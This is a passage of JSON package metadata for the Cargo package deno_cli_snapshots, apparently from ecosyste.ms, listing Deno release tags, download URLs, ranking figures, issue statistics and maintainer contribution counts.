wnload_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T17:16:19.502Z","dependent_packages_count":1,"downloads":14031,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":27.520321105541452,"dependent_repos_count":29.318292202377133,"dependent_packages_count":16.95609541526534,"stargazers_count":0.04215426628666734,"forks_count":0.10080368025072624,"average":14.787533333944264},"purl":"pkg:cargo/deno_cli_snapshots","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cli_snapshots","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cli_snapshots","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cli_snapshots/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"